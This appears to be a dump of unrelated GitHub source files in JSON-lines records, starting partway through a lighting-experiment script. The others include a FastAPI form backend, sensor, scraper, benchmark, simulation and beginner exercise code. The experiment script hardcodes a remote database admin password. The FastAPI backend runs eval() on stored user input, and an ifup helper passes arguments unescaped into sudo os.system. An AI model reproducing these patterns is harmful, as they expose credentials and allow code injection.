mean_f})\n\n if not min_g_point:\n # if it is first iteration - set first point as min\n min_g_point = point\n else:\n # compare values of current point and max point\n if point['mean_q'] < min_g_point['mean_q']:\n min_g_point = point\n\n if not max_f_point:\n # if it is first iteration - set first point as min\n max_f_point = point\n else:\n # compare values of current point and max point\n if point['mean_f'] > max_f_point['mean_f']:\n max_f_point = point\n\n num_of_table_points += 1\n except Exception as e:\n exc_info = sys.exc_info()\n err_list = traceback.format_exception(*exc_info)\n print(\"\\n ERROR, point: {} \\n calculation failed: {} \\n\".format(point, err_list))\n error_points.append(point)\n\n min_g_point.update({'date': d})\n max_f_point.update({'date': d})\n sweet_print(\"we have calculated {} search table lines from 16\".format(num_of_table_points))\n\n count_command = \"select count(*) from exp_data where date(end_time)\" \\\n \" = date('{}') and exp_id={};\".format(d, exp_id)\n cur.execute(count_command)\n rows = cur.fetchall()\n num_of_all_points = rows[0]['count(*)']\n sweet_print(\"num of problems in search table {} from 16 \".format(len(error_points)))\n sweet_print(\"full number of day {} stored points is {}, must be about 32 \".format(d, num_of_all_points))\n sweet_print(\"min g point is : {}\".format(min_g_point))\n # print(\"\\n min f point is : {} \\n\".format(max_f_point))\n\n r_min = min_g_point['red']\n w_min = min_g_point['white']\n\n # print(\"final search table:\")\n # for p in _search_table:\n # print(p)\n\n continue_ = str(raw_input(\"would you like to add this day to calculation? y or n: \"))\n if continue_ == 'y':\n\n # second - calculation of control E_mean (in ppfd) final value for each day\n command = \"select * from exp_data where date(end_time) = \" \\\n \"date('{}') and exp_id={};\".format(d, _exp_id)\n cur.execute(command)\n rows = cur.fetchall()\n\n num_of_search_points = len(rows)\n num_of_stable_points = 96 - num_of_search_points\n # 96 is a number of 15-mins intervals in 24 hours\n sweet_print(\"in day {} we got {} search points and {} stable points\".format(\n d, num_of_search_points, num_of_stable_points))\n\n reds = [a[\"red\"] for a in rows ]\n whites = [a[\"white\"] for a in rows]\n\n E_search_summ = 0\n\n for (r, w) in zip(reds, whites):\n E_search_summ += red_far_by_curr(r, \"exp\", h_led_exp) + \\\n white_far_by_curr(w, \"exp\", h_led_exp)\n\n E_search_mean = E_search_summ/96\n E_stable_summ = red_far_by_curr(r_min, \"exp\", h_led_exp) + \\\n white_far_by_curr(w_min, \"exp\", h_led_exp)\n E_stable_mean = E_stable_summ * num_of_stable_points / 96\n sweet_print(\"in day {} we got E_search_summ = {} E_search_mean = {} and E_stable_mean = {}\"\n .format(d, E_search_summ, E_search_mean, E_stable_mean))\n sweet_print(\"r_min_stable = {}, w_min_stable = {}\".format(r_min, w_min))\n\n E_final_exp = E_search_mean + E_stable_mean\n\n sweet_print(\"in day {} we got E_final_mean = {}\"\n .format(d, E_final_exp))\n\n E_mean_days.append(E_final_exp)\n\n print(\"\\n ===========================================================\")\n print(\"final values calculation\")\n # finally - calculation of control G final values for control and experiment\n E_control = red_far_by_curr(R_control, \"control\", h_led_control) + \\\n white_far_by_curr(W_control, \"control\", h_led_control)\n\n sweet_print(\"E_mean_values_for all days is: \\n {}\".format(E_mean_days))\n sweet_print(\"final E_control = {} ppfd, E_exp = {} ppfd\".format(\n E_control, np.mean(E_mean_days)))\n\n G_control_fin = final_intQ(E_control, dM_control, mode=\"control\")\n G_exp_fin = final_intQ(np.mean(E_mean_days), dM_exp, mode=\"exp\")\n\n sweet_print(\"G_control_fin = {} , G_exp_fin = {}\".format(G_control_fin, G_exp_fin))\n\n result = (G_control_fin - G_exp_fin) / G_control_fin * 100\n sweet_print(\"Global result (Gc - Ge)/Gc * 100% = {} %\".format(result))\n\n\n con.close()\n\n\nif __name__ == \"__main__\":\n\n search_table = [\n {\"number\": 1, \"red\": 130, \"white\": 130, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 2, \"red\": 70, \"white\": 190, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 3, \"red\": 190, \"white\": 70, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 4, \"red\": 40, \"white\": 160, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 5, \"red\": 160, \"white\": 40, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 6, \"red\": 100, \"white\": 100, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 7, \"red\": 220, \"white\": 220, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 8, \"red\": 25, \"white\": 235, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 9, \"red\": 145, \"white\": 115, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 10, \"red\": 85, \"white\": 55, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 11, \"red\": 205, \"white\": 175, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 12, \"red\": 55, \"white\": 85, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 13, \"red\": 175, \"white\": 205, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 14, \"red\": 115, \"white\": 145, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 15, \"red\": 235, \"white\": 25, \"finished\": 0, 'f': 0, 'q': 0},\n {\"number\": 16, \"red\": 17, \"white\": 138, \"finished\": 0, 'f': 0, 'q': 0}\n ]\n\n exp_id = 9\n\n db = {\n \"host\": '10.9.0.23',\n \"user\": 'remote_admin',\n \"db\": 'experiment',\n \"password\": \"amstraLLa78x[$\"\n }\n\n calculate_final_effect(_db_params=db, _search_table=search_table,\n _exp_id=exp_id, dM_exp=149, dM_control=232,\n R_control=10, W_control=250, h_led_control=25, h_led_exp=25)\n\n","repo_name":"houseofbigseals/ros_farmer_pc","sub_path":"scripts/math_scripts/calculate_final.py","file_name":"calculate_final.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70866478133","text":"from app import app\nfrom models import db, User\n\n# Create all tables\ndb.drop_all()\ndb.create_all()\n\n# If table isn't empty, empty it\nUser.query.delete()\n\n# Add new data\ndata_1 = User(first_name='joel', last_name=\"burton\", image_url=\"profile.jpg\")\ndata_2 = User(first_name='alan', last_name=\"alda\")\ndata_3 = User(first_name='jane', last_name=\"smith\")\n\n# Add new objects to session, so they'll persist\ndb.session.add(data_1)\ndb.session.add(data_2)\ndb.session.add(data_3)\n\n# Commit--otherwise, this never gets saved!\ndb.session.commit()\n","repo_name":"brianelizondo/python-sqlalchemy-intro","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25223675701","text":"# Altere o programa anterior para mostrar no final a soma dos números.\n\nnum1 = int(input('Digite um número inteiro: \\n'))\nnum2 = int(input('Digite outro número iteiro: \\n'))\nsoma = 0\nprint('-'*30)\n\nif num1 > num2:\n for i in range(num2+1, num1):\n print(i)\n soma = soma + i\nelif num1 < num2:\n for i in range(num1+1, num2):\n print(i)\n soma = soma + i\nelse:\n print('Números iguais.')\n\nprint('-'*30)\nprint('A soma dos números entre o intervalo de {} e {} é {}.'.format(num1, num2, soma))","repo_name":"Isidroantonio/Exercicios-Python-","sub_path":"ex11.py","file_name":"ex11.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14312266447","text":"\"\"\"\nAuthor : Akshay Joshi\nGitHub : https://github.com/ijoshi90\nCreated on 11-Sep-19 at 20:26\n\"\"\"\n\nclass Computer:\n def __init__(self, computer, processor, ram):\n print (\"In __init__\")\n globals()['a'] = \"Akshay\"\n self.computer = computer\n self.processor = processor\n self.ram = ram\n\n def configuration(self):\n print (\"*** Configuration ***\")\n print(\"Type : {}\".format(self.computer))\n print(\"Processor : {}\".format(self.processor))\n print(\"RAM : {}\".format(self.ram))\n\ncom1 = Computer(\"Desktop\", \"i5\", \"1 x 8GB\")\ncom2 = Computer(\"Laptop\", \"i7\", \"1 x 8GB\")\n\ncom1.configuration()\nprint (\"A : {}\".format(a))\ncom2.configuration()","repo_name":"ijoshi90/Python","sub_path":"Python/init_method.py","file_name":"init_method.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71577469172","text":"import decoding_2d as dc2\nimport decoding_3d as dc3\nimport pickle as pkl\nimport numpy as np\nfrom multiprocessing import Process\nfrom timeit import default_timer as timer\n\ndef run_batch(err_lo, err_hi, n_points, dists, n_trials, flnm, sim_type='iidxz'):\n \"\"\"\n Makes a bunch of simulation objects and runs them, based on input\n parameters.\n \"\"\"\n sim_type = sim_type.lower()\n if sim_type not in ['iidxz', 'pq', 'circ']:\n raise ValueError(\"sim_type must be one of: ['iidxz', 'pq', 'circ']\")\n\n errs = np.linspace(err_lo, err_hi, n_points)\n output_dict = locals()\n\n for dist in dists:\n failures = []\n for err in errs:\n if sim_type == 'iidxz':\n current_sim = dc2.Sim2D(dist, dist, err)\n elif sim_type == 'pq':\n current_sim = dc3.Sim3D(dist, dist, ('pq', err, err))\n elif sim_type == 'circ':\n raise NotImplementedError(\"Coming Soon!\")\n\n current_sim.run(n_trials, progress=False)\n failures.append(current_sim.errors)\n output_dict.update({'failures ' + str(dist) : failures})\n\n with open(flnm, 'wb') as phil:\n pkl.dump(output_dict, phil)\n\n pass\n\n\ndef run_batch_par(err_lo, err_hi, n_points, dists, n_trials, flnm, sim_type, nThreads):\n jobs = []\n trialsPerThread = n_trials/nThreads\n\n for i in range(nThreads):\n fname = \"out\" + str(i) + \".dat\"\n p = Process(target=run_batch, args=(err_lo, err_hi, n_points, dists, trialsPerThread, fname, sim_type,))\n jobs.append(p)\n p.start()\n\n for p in jobs:\n p.join()\n\nif __name__ == '__main__':\n from sys import argv\n nThreads = 4\n n_trials = nThreads*16 # keep it a multiple of nThreads for now\n err_lo = 0.01\n err_hi = 0.03\n n_points = 30\n dists = [25]\n flnm = 'out.dat'\n sim_type = 'iidxz'\n\n # just for benchmarking/testing\n # comment for actual run\n print(\"Sequential execution ...\")\n start = timer()\n run_batch(err_lo, err_hi, n_points, dists, n_trials, flnm, sim_type)\n end = timer()\n seqtime = (end-start)\n print(\"Sequential execution took : {0} ms\".format(seqtime*1e3))\n\n print(\"Parallel execution ...\")\n start = timer()\n run_batch_par(err_lo, err_hi, n_points, dists, n_trials, flnm, sim_type, nThreads)\n end = timer()\n partime = (end-start)\n print(\"Parallel execution on {0} threads took {1} ms \".format(nThreads,partime*1e3) )\n","repo_name":"bcriger/sc_decoding","sub_path":"run_script_par.py","file_name":"run_script_par.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38504281684","text":"from gpiozero import MotionSensor\nimport paho.mqtt.publish as publish\nimport os\n\n# publish a message then disconnect.\nhost = os.environ['MQTT_HOST']\ntopic = os.environ['MQTT_TOPIC']\npin = int(os.environ['PIN_INPUT'])\n\n#pir sensor\npir = MotionSensor(pin)\ncurren_status = 0\nlast_status = 0\n\nwhile True:\n curren_status = pir.motion_detected\n\n if curren_status and curren_status!=last_status:\n print(\"Motion detected!\")\n publish.single(topic, 1, qos=1, hostname=host)\n elif not curren_status and curren_status!=last_status:\n print(\"Nothing\")\n publish.single(topic, 0, qos=1, hostname=host)\n last_status = curren_status\n","repo_name":"WakeupTsai/docker-rpi-pir-mqtt","sub_path":"pir-mqtt/pir_mqtt.py","file_name":"pir_mqtt.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23129618805","text":"#!/usr/bin/env python3\n\nimport hashlib\nimport hmac\nimport timeit\n\nNUMBER_DIGESTS = 100000\n\nSECRET = \"This-is-my-super-duper-secret-key-12345#\"\n\ndef digest_loop(digestmod, data):\n the_hmac = hmac.new(SECRET.encode(), digestmod=digestmod)\n the_hmac.update(data)\n _digest = the_hmac.digest()\n\ndef digest_measurement(digestmod, digestmod_name, data_len):\n data = b'\\xab' * data_len\n measured_function = lambda: digest_loop(digestmod, data)\n time_in_secs = timeit.timeit(measured_function, number=NUMBER_DIGESTS)\n hashes_per_second = NUMBER_DIGESTS / time_in_secs\n usecs_per_hash = 1000000 / hashes_per_second\n print(\"{:12} {:12,} {:12,} {:12,}\".format(digestmod_name, data_len, int(hashes_per_second),\n int(usecs_per_hash)))\n\ndef experiment():\n print(\"{:12} {:12} {:12} {:12}\".format(\"Algo\", \"Data size\", \"Digests/sec\", \"Usec/digest\"))\n line = '-' * 12\n print(\"{:12} {:12} {:12} {:12}\".format(line, line, line, line))\n for data_len in [10, 100, 1500, 10000]:\n for digestmod, digestmod_name in [(hashlib.md5, \"MD-5\"),\n (hashlib.sha1, \"SHA-1\"),\n (hashlib.sha224, \"SHA-224\"),\n (hashlib.sha256, \"SHA-256\"),\n (hashlib.sha384, \"SHA-384\"),\n (hashlib.sha512, \"SHA-512\"),\n (hashlib.sha3_224, \"SHA3-224\"),\n (hashlib.sha3_256, \"SHA3-256\"),\n (hashlib.sha3_384, \"SHA3-384\"),\n (hashlib.sha3_512, \"SHA3-512\"),\n (hashlib.blake2b, \"BLAKE-2B\"),\n (hashlib.blake2s, \"BLAKE-2S\")]:\n digest_measurement(digestmod, digestmod_name, data_len)\n\nif __name__ == \"__main__\":\n experiment()\n","repo_name":"brunorijsman/python-hash-experiments","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20034461839","text":"import scrapy\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom porcelain.items import jiadeItems\n\n\nbrowser = webdriver.Chrome()\n\n\nclass JiadeSpider(scrapy.Spider):\n name = 'jiade'\n allowed_domains = ['cguardian.com']\n start_urls = ['https://www.cguardian.com/Auctions/AuctionResult']\n\n def parse(self, response):\n try:\n browser.get(self.start_urls[0])\n all_url_count = int(browser.find_element_by_xpath(\n '//*[@id=\"app\"]/div/div[2]/div/div[3]/div[2]/div[12]/div/span/div/input'\n ).get_attribute('max'))\n for page in range(1, all_url_count):\n self.page_click(browser, page)\n for item in range(2, 12):\n be_re = f'//*[@id=\"app\"]/div/div[2]/div/div[3]/div[2]/div[{str(item)}]'\n be_item_click = browser.find_element_by_xpath(be_re)\n be_item_click.click()\n all_items_count = len(browser.find_elements_by_xpath('//div[@class=\"category-list-border\"]/div'))\n for i in range(1, all_items_count+1):\n be_item_re = be_re + f'/div[2]/div[{str(i)}]'\n self.item_click(browser, be_item_re)\n self.parse_data(browser)\n\n be_item_ocunt = int(browser.find_element_by_xpath('//*[@id=\"item-content\"]/div[2]/div/span/div/input').get_attribute('max'))\n for j in be_item_ocunt(1, be_item_ocunt+1):\n new_item_page = browser.find_element_by_xpath('//*[@id=\"item-content\"]/div[2]/div/span/div/input')\n new_item_page.clear()\n new_item_page.send_keys(j)\n new_item_page.send_keys(Keys.ENTER)\n self.parse_data(browser)\n browser.back()\n\n\n except Exception as e:\n print(e)\n\n\n def page_click(self, browser, page):\n page_click = browser.find_element_by_class_name('el-input__inner')\n page_click.clear()\n page_click.send_keys(page)\n page_click.send_keys(Keys.ENTER)\n\n def item_click(self, browser, be_item_re):\n item = browser.find_element_by_xpath(be_item_re)\n item.click()\n\n def parse_data(self, browser):\n pa_data = browser.find_elements_by_xpath('//*[@id=\"item-content\"]/div/div')\n for item in pa_data:\n item = item.text\n item_list = item.splitlines()\n if item_list is not None:\n jiadeItems['num'], jiadeItems['name'], jiadeItems['date'], jiadeItems['price'] = item_list\n\n\n\n\n\n","repo_name":"delcok/Scrapy_for_someone","sub_path":"porcelain/spiders/jiade.py","file_name":"jiade.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7173811248","text":"import dgl\nimport dgl.function as fn\nimport tensorflow as tf\n\nfrom core.policy_network import HeteroGraphPolicyNetwork\n\n\nclass Agent:\n def __init__(self):\n\n self.policy_network = HeteroGraphPolicyNetwork()\n\n\ndef _construct_segment_pair_auxillary_graph(original_graph, segment_pair):\n seg_a_pt0 = segment_pair[:, 0]\n seg_a_pt1 = segment_pair[:, 1]\n seg_b_pt0 = segment_pair[:, 2]\n seg_b_pt1 = segment_pair[:, 3]\n\n n_seg_pairs = segment_pair.shape[0]\n aux_join_pt0 = tf.range(0, n_seg_pairs, dtype=tf.int64)\n aux_join_pt1 = tf.range(n_seg_pairs, 2 * n_seg_pairs, dtype=tf.int64)\n aux_join_pairs = tf.range(0, n_seg_pairs, dtype=tf.int64)\n\n seg_inds, pt_inds = original_graph.edges(etype=\"segment_has_point\")\n aux_graph = dgl.heterograph(\n {\n (\"point\", \"in\", \"segment\"): (pt_inds, seg_inds),\n (\"point\", \"join\", \"aux_pt_pair\"): (\n tf.concat(\n [seg_a_pt0, seg_a_pt1, seg_b_pt0, seg_b_pt1], axis=0\n ),\n tf.concat(\n [aux_join_pt0, aux_join_pt1, aux_join_pt0, aux_join_pt1],\n axis=0,\n ),\n ),\n (\"aux_pt_pair\", \"join\", \"seg_pairs\"): (\n tf.concat([aux_join_pt0, aux_join_pt1], axis=0),\n tf.concat([aux_join_pairs, aux_join_pairs], axis=0),\n ),\n }\n ) # .long()\n aux_graph.edges[(\"point\", \"join\", \"aux_pt_pair\")].data[\n \"weight\"\n ] = tf.concat(\n [tf.ones(shape=(2 * n_seg_pairs)), -tf.ones(shape=(2 * n_seg_pairs))],\n axis=0,\n )\n return aux_graph\n\n\ndef _calculate_segment_pair_probabilities(aux_graph, point_logits):\n with aux_graph.local_scope():\n aux_graph.nodes[\"point\"].data[\"logit\"] = point_logits\n\n aux_graph.update_all(\n message_func=fn.u_mul_e(\"logit\", \"weight\", \"m\"),\n reduce_func=fn.sum(\"m\", \"pt_pair_logit\"),\n etype=(\"point\", \"join\", \"aux_pt_pair\"),\n )\n aux_graph.nodes[\"aux_pt_pair\"].data[\"pt_pair_logit\"] = tf.math.tanh(\n aux_graph.nodes[\"aux_pt_pair\"].data[\"pt_pair_logit\"]\n )\n aux_graph.update_all(\n message_func=fn.copy_u(\"pt_pair_logit\", \"m\"),\n reduce_func=fn.sum(\"m\", \"seg_pair_logit\"),\n etype=(\"aux_pt_pair\", \"join\", \"seg_pairs\"),\n )\n aux_graph.nodes[\"seg_pairs\"].data[\"seg_pair_logit\"] = -tf.math.abs(\n aux_graph.nodes[\"seg_pairs\"].data[\"seg_pair_logit\"]\n )\n probabilities = dgl.softmax_nodes(\n aux_graph, \"seg_pair_logit\", ntype=\"seg_pairs\"\n )\n return probabilities\n","repo_name":"JosephRRB/GFlowNets-on-2D-LCDT","sub_path":"core/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34086610355","text":"#!/usr/bin/python3\n\"\"\"\nPrints all 'City' objects from the database\n\"\"\"\nimport sys\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom model_city import City, Base\nfrom model_state import State\n\nif __name__ == \"__main__\":\n # Connect to the MySQL server\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(sys.argv[1], sys.argv[2], sys.argv[3]),\n pool_pre_ping=True)\n Base.metadata.create_all(engine)\n\n # Create a Session object\n Session = sessionmaker(bind=engine)\n session = Session()\n\n # Query all City objects and join with the corresponding State object\n city_state_join = (\n session.query(City, State)\n .join(State, City.state_id == State.id)\n )\n\n # Sort the results by City ID in ascending order\n sorted_city_state_join = city_state_join.order_by(City.id.asc())\n\n # Iterate over the sorted City-State pairs\n for city, state in sorted_city_state_join:\n print(f\"{state.name}: ({city.id}) {city.name}\")\n\n # Close the Session\n session.close()\n","repo_name":"kibuchijw/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/14-model_city_fetch_by_state.py","file_name":"14-model_city_fetch_by_state.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36737871573","text":"#sum.py\n# A program that finds the sum of a number from 1 to 1000\n# using a for loop\n\ndef main():\n sum = 0\n n = 1000\n\n for number in range (n+1):\n sum = sum + number\n\n print(sum)\n\nmain()\n\n \n","repo_name":"Barryelias/lab1","sub_path":"sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72331078508","text":"from pico2d import *\n\nclass Mini_Map:\n\n TIME_PER_ACTION = 0.08\n ACTION_PER_TIME = 1.0 / TIME_PER_ACTION\n FRAMES_PER_ACTION = 8\n\n STAGE1, STAGE2 , STAGE3 , STAGE4 , RUN , STAND = 1, 2 , 3 , 4 , 5 , 6\n stage1_image = None\n stage2_image = None\n stage3_image = None\n stage4_image = None\n position_image = None\n\n def __init__(self):\n self.stage = Mini_Map.STAGE1\n if Mini_Map.stage1_image == None:\n Mini_Map.stage1_image = load_image(\"./image/map.png\")\n if Mini_Map.stage2_image == None:\n Mini_Map.stage2_image = load_image(\"./image/map2.png\")\n if Mini_Map.stage3_image == None:\n Mini_Map.stage3_image = load_image(\"./image/map3.png\")\n if Mini_Map.stage4_image == None:\n Mini_Map.stage4_image = load_image(\"./image/map4.png\")\n if Mini_Map.position_image == None:\n Mini_Map.position_image = load_image(\"./image/moving.png\")\n self.position_x = 120\n self.position_y = 320\n self.total_frames = 0.0\n self.state = Mini_Map.STAND\n self.speed = 0\n\n def update(self,frame_time,morale,ingame_time):\n def clamp(minimum, x, maximum):\n return max(minimum, min(x, maximum))\n self.total_frames += Mini_Map.FRAMES_PER_ACTION * Mini_Map.ACTION_PER_TIME * frame_time\n if self.state == Mini_Map.RUN:\n self.position_x += self.speed\n if self.position_x>=500:\n morale.state = morale.SUCCESS\n if ingame_time.run_time :\n ingame_time.stop()\n\n\n\n def draw(self):\n if self.stage==1:\n self.stage1_image.clip_draw(0,0,600,100,400,340)\n if self.stage==2:\n self.stage2_image.clip_draw(0,0,600,100,400,340)\n if self.stage==3:\n self.stage3_image.clip_draw(0,0,600,100,400,340)\n if self.stage==4:\n self.stage4_image.clip_draw(0,0,600,100,400,340)\n self.position_image.clip_draw(0,0,22,24,self.position_x,self.position_y)\n\n def handle_event(self, event, unit):\n\n if (event.type, event.key) == (SDL_KEYDOWN, SDLK_RIGHT):\n print(self.speed)\n self.state = Mini_Map.RUN\n if self.speed>=0:\n self.speed += Mini_Map.TIME_PER_ACTION\n elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_z):\n if unit.state in (unit.STAND, unit.RUN):\n self.state = Mini_Map.STAND\n elif (event.type, event.key) == (SDL_KEYUP, SDLK_RIGHT):\n self.state = Mini_Map.STAND\n if self.speed>=Mini_Map.TIME_PER_ACTION:\n self.speed -= Mini_Map.TIME_PER_ACTION\n elif (event.type, event.key) == (SDL_KEYUP, SDLK_z):\n if unit.check_run:\n self.state = Mini_Map.RUN","repo_name":"GreeeeeShot/2dgp","sub_path":"project_ahead/mini_map.py","file_name":"mini_map.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37218090373","text":"#!/usr/bin/python\nfrom subprocess import check_output\nimport sys\nimport time\nimport os\n\n\ndef get_all_interface():\n output = check_output(\"sudo ip l\", shell=True)\n return output\n\n\ndef set_interface_up(name):\n while True:\n if name in get_all_interface():\n print(\"sudo ifup %s\" % name)\n os.system(\"sudo ifup %s\" % name)\n return\n time.sleep(1)\n\n\ndef main():\n for i in sys.argv[1:]:\n set_interface_up(i)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"kjelly/kolla-ansible-docker","sub_path":"kolla-prepare/ifup.py","file_name":"ifup.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44102809061","text":"from fastapi import FastAPI, HTTPException\nfrom starlette.responses import HTMLResponse\nfrom os.path import join, dirname, exists\n\napp = FastAPI()\n\nFILE_PATH = join(dirname(__file__), 'client_forms.txt')\n\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def read_items():\n html_content = \"\"\"\n \n \n Backend for Portfolio\n \n \n This is Backend for Portfolio website github/\n \n \n \"\"\"\n return HTMLResponse(content=html_content, status_code=200)\n\n\n@app.get('/client_form')\ndef test_func(name, email, phone=None):\n user = {\n \"name\": name,\n \"email\": email\n }\n\n if phone and len(phone) > 6:\n user[\"phone\"] = phone\n else:\n raise HTTPException(status_code=422, detail=\"Incorrect phone number\")\n\n with open(FILE_PATH, 'a') as f:\n f.write(str(user) + '\\n')\n\n return user\n\n\n@app.get('/all_client_form')\ndef all_client_form():\n users = []\n\n if exists(FILE_PATH):\n with open(FILE_PATH) as f:\n for line in f:\n users.append(eval(line.rstrip()))\n\n return users","repo_name":"AnlieJams/My-WebSite","sub_path":"My Web Site/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74018532268","text":"'''\n39 - A importância de R$ 780.000,00 será dividida entre três ganhadores de um concurso.\nSendo que da quantia total.\n\n * O primeiro ganhador receberá 46%;\n * O segundo receberá 32%;\n * O terceiro receberá o restante;\n\n Calcule e imprima a quantia ganha por cada um dos ganhadores.\n'''\n\n# RESPOSTA\n\npremiação = 780.00000\nprimeiro = (46 / 100) * premiação\nsegundo = (32 / 100) * premiação\nterceiro = (22 / 100) * premiação\nprint(f'Primeiro {primeiro:.5f} \\nSegundo {segundo:.5f}'\n f' \\nTerceiro {terceiro:.5f}\\n')\ntotal = primeiro + segundo + terceiro\nprint(f'Total da premiação {total:.5f}')\n\n","repo_name":"Leownhart/My_Course_of_python","sub_path":"Geek University/Seção 4/Exercicios/EX39.py","file_name":"EX39.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20163514521","text":"import argparse\nimport csv\nimport requests\nimport json\nimport logging\n\nfrom pkg.net import EngageNet\n\n\"\"\"Python3 app to list all activities for a client and export the \n results as a CSV. Each line of the CSV is an action and contains\n the usual information that clients want to see.\"\"\"\n\ndef listActivityTypes(webToken):\n\t\"\"\"Return a list of valid activity types\n\n\tParameters:\n\t\twebToken \tEngage Web Developer API token\n\n\tErrors:\n\t\tHTTP errors are also noisily fatal.\n\t\tEngage-specific errors are also noisily fatal.\n\t\"\"\"\n\n\t# Parameters for EngageNet\n\tparams = {\n\t 'endpoint': 'api/developer/ext/v1/activities/types',\n\t 'host': 'api.salsalabs.org',\n\t 'token': webToken,\n\t 'method': 'GET',\n\t 'request': \"\"\n\t}\n\tnet = EngageNet(**params)\n\tr = net.run()\n\tp = r['payload']\n\tr = p['results']\n\tt = list((s['code'] for s in r))\n\treturn t\n\ndef listActivities(intToken, webToken, writer):\n\t\"\"\"Read a list of activity. Write typically useful information\n\t\tto a CSV file.\n\n\tParameters:\n\t\tintToken Engage Integration API token\n\t\twebToken\tEngage Web Developer API token\n\t\twriter\t\tCSV writer to receive output\n\n\tErrors:\n\t\tHTTP errors are also noisily fatal.\n\t\tEngage-specific errors are also noisily fatal.\n\t\"\"\"\n\n\tactivityTypes = listActivityTypes(webToken)\n\tif activityTypes == None:\n\t\tlogging.fatal('Error: could not retrieve activity type list')\n\t\texit(1)\n\n\tcolumns ='id,dateCreated,datePublished,status,visibility,type,name'.split(',')\n\twriter.writerow(columns)\n\n\tcount = 20\n\toffset = 0\n\twhile count > 0:\n\t\tqueries = {\n\t\t\t'formType': ','.join(activityTypes),\n\t\t\t'sortOrder': 'ASCENDING',\n\t\t\t'count': count,\n\t\t\t'offset': offset\n\t\t}\n\t\tparams = {\n\t\t 'endpoint': 'api/developer/ext/v1/activities',\n\t\t 'host': 'api.salsalabs.org',\n\t\t 'token': webToken,\n\t\t 'method': 'GET',\n\t\t 'request': queries\n\t\t}\n\t\tnet = EngageNet(**params)\n\t\tresponse = net.run()\n\n\t\tpayload = response['payload']\n\t\tcount = payload['count']\n\t\tif count == 0:\n\t\t\tcontinue\n\t\tresults = payload['results']\n\t\tfor r in results:\n\t\t\tif r['status'] == 'PUBLISHED':\n\t\t\t\tpublished = r['publishDate'][0:10]\n\t\t\telse:\n\t\t\t\tpublished = \"\"\n\t\t\trow = [r['id'],\n\t\t\t\tr['createDate'][0:10],\n\t\t\t\tpublished,\n\t\t\t\tr['status'],\n\t\t\t\tr['visibility'],\n\t\t\t\tr['type'],\n\t\t\t\tr['name']]\n\t\t\twriter.writerow(row)\n\t\toffset = offset + count\n\ndef main():\n\t\"\"\"Program entry point. Uses a user-provided id, retrieves\n\tactivities and outputs JSON to the console.\"\"\"\n\n\tlogging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)\n\tparser = argparse.ArgumentParser(\n\t\tdescription='See list of forms for an form type')\n\tparser.add_argument(\"--intToken\", action='store', required=True,\n\t\t\t\t\t\thelp='Engage Integration API token')\n\tparser.add_argument('--webToken', action='store', required=True,\n\t\t\t\t\t\thelp='Engage Web Developer API token')\n\n\targs = parser.parse_args()\n\twith open('activity_list.csv', 'w') as f:\n\t\tw = csv.writer(f)\n\t\tlistActivities(args.intToken, args.webToken, w)\n\t\tf.flush()\n\t\tf.close()\n\n\nif (__name__) == 